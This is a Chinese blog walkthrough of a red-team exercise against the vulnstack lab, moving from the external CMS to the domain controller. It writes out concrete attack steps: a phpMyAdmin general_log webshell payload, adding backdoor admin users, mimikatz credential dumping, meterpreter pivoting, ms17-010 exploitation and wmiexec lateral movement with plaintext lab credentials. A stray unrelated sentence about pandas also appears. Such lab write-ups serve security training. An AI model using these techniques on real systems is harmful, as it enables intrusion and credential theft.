从外网到域控(vulnstack靶机实战)

从外网到域控(vulnstack靶机实战)

前言

vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

拓扑结构大体如下:

在这里插入图片描述

一、外网初探登录进入Yxcms

示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。
用字典爆破出密码:123456

在这里插入图片描述
在这里插入图片描述
登录进去

在这里插入图片描述
查找有用信息
在这里插入图片描述
进入index中查看
在这里插入图片描述
在这里插入图片描述

二、登录phpmyadmin

在这里插入图片描述
发现猜测的没错,那么默认密码呢,root、root发现竟然也进去了,那么就来复习一下phpmyadmin后台getshell吧。phpmyadmin后台getshell一般有以下几种方式:

1、select into outfile直接写入
2、开启全局日志getshell
3、使用慢查询日志getsehll
4、使用错误日志getshell
5、利用phpmyadmin4.8.x本地文件包含漏洞getshell

我们先来看一下第一种,直接写shell

在这里插入图片描述
发现是不行的,而且该变量为只读,所以只能放弃。
再来看一下第二种,利用全局变量general_log去getshell
在这里插入图片描述
我们尝试更改日志状态、位置
set global general_log=on;# 开启日志
set global general_log_file=‘C:/phpstudy/www/yxcms/v01cano.php’;# 设置日志位置为网站目录
发现已经成功更改
在这里插入图片描述
此时执行如下语句即可getshell

select ‘<?php assert($_POST["a"]); ?>’
剩下的就不再去测试了,大家有兴趣的可以去自行尝试

用蚁剑进行连接:
在这里插入图片描述
拿到shell之后我们就该提权了

三、杀入内网

在这里插入图片描述

尝试添加用户:

C:\phpStudy\WWW\yxcms> net user test N0hWI!@! /add
命令成功完成。
C:\phpStudy\WWW\yxcms> net localgroup administrators test /add
命令成功完成。
可以发现已经成功添加一个用户上去

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
猜测应该是防火墙的问题,查看虚拟机发现猜测没错
在这里插入图片描述
此时思路一般如下:

1、反弹一个msf的shell回来,尝试关闭防火墙
2、尝试使用隧道连接3389

我们先来看一下第二种我们这里使用ngrok:

在ngrok中添加一条tcp隧道就ok然后了,然后我们就可以去连接目标的3389了

在这里插入图片描述
我们再来看一下第一种的操作,先反弹一个msf的shell回来
在这里插入图片描述
关闭防火墙:

meterpreter > run post/windows/manage/enable_rdp

在这里插入图片描述
此时我们便可以直接连接目标主机了
在这里插入图片描述
下面我们就该去杀入域控了,杀入域之前我们先来做一些基础的信息收集,毕竟大佬说过渗透测试的本质是信息收集.

在这里插入图片描述
经过一番信息收集,我们可以知道域控的地址为:192.168.52.138、域成员主机03地址:192.168.52.141
然后抓一下本地管理员的密码:
参考网址:https://www.onebug.org/websafe/76049.html
首先使用getsystem进行提权
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
但是这样获取的hash不是很全面,我们再使用mimitakz进行抓取
Mimitakz介绍相关网址https://www.cnblogs.com/pursuitofacm/p/6704219.html?utm_source=itdadao&utm_medium=referral
meterpreter > mimikatz_command -f samdump::hashes

在这里插入图片描述
在这里插入图片描述
在本环境中我们是没有办法直接抓取明文的,当然也有办法绕过就是自己上传一个mimitakz使用debug进行明文抓取

我们先把mimitakz(实战中需要免杀处理)上传上去:
在这里插入图片描述
然后进行明文密码抓取

在这里插入图片描述
先进行权限提
privilege::debug
然后使用
sekurlsa::logonPasswords
进行明文抓取
在这里插入图片描述

此时我们就已经获取到了administrator的明文密码
我们再对03进行渗透

四、内网漫游

先添加一条路由进来:
meterpreter > run autoroute -s 192.168.52.0/24

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
对另外的漏洞也进行了测试
后来发现都还是失败了…额,后来查看发现是目标主机这些服务默认没有开启,需要手工开启…

算了直接使用ms17-010打一个shell回来,这里要注意一下,msf内置的17-010打2003有时候多次执行后msf就接收不到session,而且ms17-010利用时,脆弱的server 2003非常容易蓝屏。
本人也尝试了一下github上的windows 2003 – windows 10全版本的msf 17-010脚本,但效果都是一般…这里也给出脚本名称,大家可以自己去找一下…(ms17_010_eternalblue_doublepulsar)

这里的话呢,先给大家说一下思路,首先机器为域内主机,不通外网我们不能直接使用17-010来打,可以先使用msf的socks功能做一个代理出来,这样我们便可以使用nmap等对其进行简单的信息判断

像这样(-PN、-sT必须加):

proxychains nmap -p 3389 -Pn -sT 192.168.52.141
在这里插入图片描述
而且使用msf的代理之后就不能使用反向shell了,我们需要使用正向shell,然后我们可以先使用auxiliary/admin/smb/ms17_010_command来执行一些命令
在这里插入图片描述
然后这时候如果你的权限是system,你可以添加一个用户,然后使用exploit/windows/smb/ms17_010_psexec 尝试去打一个shell回来,因为这个模块需要你去指定一个管理员用户….但是我这里依然失败了,于是我便添加了一个用户上去,直接使用远程桌面连接上了2003的机器…

在这里插入图片描述
然后传了一个msf的正向shell,使用msf接收到了2003的shell
在这里插入图片描述
因为是2003的机器,直接getsystem便得到了system权限
在这里插入图片描述
然后用之前相同的方法便可以得到管理员的明文密码…

这里顺便说一下,除了上面的那种方法可以得到shell,也可以添加用户和使用regeorg+proxifier进入内网连接,然后用netsh中转得到session

至此2003的渗透基本就到此为止了,我们下面来怼域控!!!

其实在前面我们已经拿到了域用户的帐号密码,即administrator、hongrisec@2019我们现在要做的就是如何登录到域控上去

我们这里的话呢使用wmi进行操作

上传wmi到192.168.52.143(win7)这个机器上去,然后执行:

C:UsersAdministratorDesktop>cscript.exe wmiexec.vbs /cmd 192.168.52.138 admin
istrator hongrisec@2019 “whoami”
得到回显
在这里插入图片描述
然后通过相同的方式下载一个msf的木马,反弹一个shell回来(正向)
得到shell
在这里插入图片描述
这里很好奇的是,为了增加难度,我在域控上加了一个安全狗上去,但是在我执行msf的shell的时候并没有提示任何异常操作…
内网穿透大杀器参考链接https://bbs.ichunqiu.com/thread-36219-1-2.html

五、我的公众号

后续操作请持续关注哦!!!
了解更多请关注下列公众号:

😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗
在这里插入图片描述
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值